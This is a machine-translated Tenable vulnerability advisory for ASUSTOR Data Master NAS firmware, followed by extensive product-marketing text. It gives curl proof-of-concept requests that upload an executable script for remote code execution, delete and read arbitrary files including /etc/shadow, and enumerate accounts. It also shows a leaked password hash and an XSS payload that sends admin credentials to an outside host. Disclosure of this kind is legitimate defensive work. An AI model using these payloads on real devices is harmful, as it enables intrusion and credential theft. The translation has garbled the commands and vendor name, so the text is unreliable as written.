脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

(R1)多个ASUSTOR数据主漏洞

剧情简介

在研究一个ASUSTOR - 202 t NAS,站得住脚的发现多个漏洞。

cve - 2018 - 15694:身份验证的文件上传

经过身份验证的远程攻击者非管理员可以上传一个文件在目标文件系统的任何地方。目标总是上传文件的名称WallPaper_1.jpg。如果“Web服务器”功能在设备上启用一个未经身份验证的远程攻击者就可以实现远程代码执行通过编写/目录/。

curl - k - x美元POST - h”内容类型:多部分/格式;边界=玩弄了——“美元——data-binary”玩弄\ x0d \ x0aContent-Disposition:格式;文件名= \“1. jpg \ \ x0d \ x0a \ x0d \ x0a # !/bin/sh \ x0aecho - e \“内容类型:文本/平原\ \ n \ \ n \”; id; uname -;猫/etc/shadow \ x0d \ x0a-pwned - \ x0d \ x0a“美元”https://192.168.1.10:8001 / portal / api /壁纸/ uploadwallpaper.cgi ? sid = 9 dpdw4u9jum.2hnb&act = upload&appdirpath = . . / . . / . ./分享/ Web /目录/{“成功”:真}$ curl http://192.168.1.10:80 - k /目录/ WallPaper_1.jpg uid = 999(管理)gid = 999(管理员)组= 100(用户),997 (nvradmins), 999(管理员)Linux克拉克3.10.70 # 1 SMP结婚2018年6月13日01:06:06 CST armv7l GNU / Linux根:$ 1 $ eN4aG9y2Mc6GFsQ1SMLSm WRyOw / 55美元。:17599:0:99999:7:::avahi: *: 15259:0:99999:7:::…

cve - 2018 - 15695:验证任意文件删除

经过身份验证的远程非管理员用户可以删除任何文件在文件系统由于路径遍历的脆弱性wallpaper.cgi

curl - k美元“https://192.168.1.10:8001 / portal / api /壁纸/ wallpaper.cgi ? sid = 2 leyw3.ehayucwvf&act = removewallpaper&appdirpath = . . / . . / . . / tmp文件=测试。文件“{“成功”:真}

枚举cve - 2018 - 15696:验证帐户

经过身份验证的远程非管理员用户可以在设备上通过枚举所有的账户user.cgi

curl - s - k美元“https://192.168.1.10:8001 / portal / api / accessControl / user.cgi吗?sid = C8wyW20b6wYUz31g&act = list&start = 0限制= 0域python - m = 0 " | json。来ol { "datas": [ { "description": "guest", "email": "", "group": "-", "name": "guest", "primary_gid": 65534, "status": "Inactive", "uid": 998 }, { "description": "Admin", "email": "", "group": "administrators", "name": "admin", "primary_gid": 999, "status": "Active", "uid": 999 }, { "description": "", "email": "", "group": "users", "name": "courtney", "primary_gid": 100, "status": "Active", "uid": 1000 }, { "description": "", "email": "", "group": "users", "name": "lab", "primary_gid": 100, "status": "Active", "uid": 1001 } ], "success": true, "total": 4 }

cve - 2018 - 15697:身份验证文件披露

经过身份验证的远程非管理员用户可以访问文件NAS分享通过指定请求的完整的文件路径downloadwallpaper.cgi。在接下来的例子中,bash历史文件读取/home/admin/

curl - k美元“https://192.168.1.10:8001门户/ api /壁纸/ downloadwallpaper.cgi ? = download&folder = / home /管理文件=。ash_history&sid = 28 tdw5u-ukn7mgan ' id ps ax netstat——netstat - a netstat -tulpn熔化炉熔化炉51417 / tcp pstree uname - ls ps ax netstat -lupn su - sudo -我退出

cve - 2018 - 15698:身份验证文件披露

远程身份验证管理用户可以阅读任何文件的内容在远程目标通过发送一个请求loginimage.cgi

curl - k美元“https://192.168.1.10:8001 / portal / api /设置/ loginimage.cgi吗?sid = 4 k4yw-gqeqazwez0&act = preview&file = / etc /影子”根:$ 1 $ WRyOw / 55美元eN4aG9y2Mc6GFsQ1SMLSm: 17599:0:99999:7:::

cve - 2018 - 15699: MITM XSS

当远程管理用户第一次验证NAS执行wgethttp://update.asustor.com/adm_update.php?architecture=armv7l&model=AS1004T&version=3.1.0.RFQ3&initialized=true和解析结果. conf文件。下面是一个示例文件:

[AS10XX] ModelName = = 3.1.4 AS10XXT版本。RID1 ReleaseDate = 2018/06/14 ReleaseNote = http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.4.RID1.pdf DownloadLink = http://download.asustor.com/download/adm/ARM_3.1.4.RID1.img

中间一个人可以修改版本字段以注入Javascript抢断管理员的凭证。例如:

Version = pwnme < img src = " http://192.168.1.237/pwn?c = ' onerror =我=新形象();i.src = this.src +。, ' / >

解决方案

升级到ASUSTOR数据主3.1.6或更高版本。

披露时间表

07-12-2018——供应商通知通过(电子邮件保护)
07-25-2018——供应商发送第二次通知。
07-25-2018——从供应商自动回复显示缺乏允许发送(电子邮件保护)
07-25-2018——通过webform ASUSTOR站得住脚的通知,他们的隐私邮件似乎被打破。要求安全联系。
07-25-2018 - ASUSTOR响应使用(电子邮件保护)
07-26-2018——站得住脚的说(电子邮件保护)坏了。已经发送两次。
07-27-2018——ASUSTOR incidates(电子邮件保护)意外被禁用。问站得住脚的再次发送。
07-27-2018——站得住脚的发送第三个和最后一个通知(电子邮件保护)
07-30-2018——ASUSTOR承认vulns说他们会尽快修复它们。
08-22-2018——站得住脚的注意到ASUSTOR推在8月15日发布的3.1.6修复。
08-22-2018——站得住脚的联系人ASUSTOR 3.1.6确认修复。
08-23-2018——Asustor忘了通知站得住脚的。要求成立确认修复。
08-24-2018——站得住脚的证实了补丁。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
交易- 2018 - 22所示
信贷

安德鲁•奥尔

CVSSv2基地/时间的分数
8.5/6.7
CVSSv2向量
AV: N /交流:M /非盟:S / C: C / I: C / A: C
受影响的产品
ASUSTOR主3.1.5和下面的数据
风险因素

咨询时间

06-24-2018 - (R1)最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map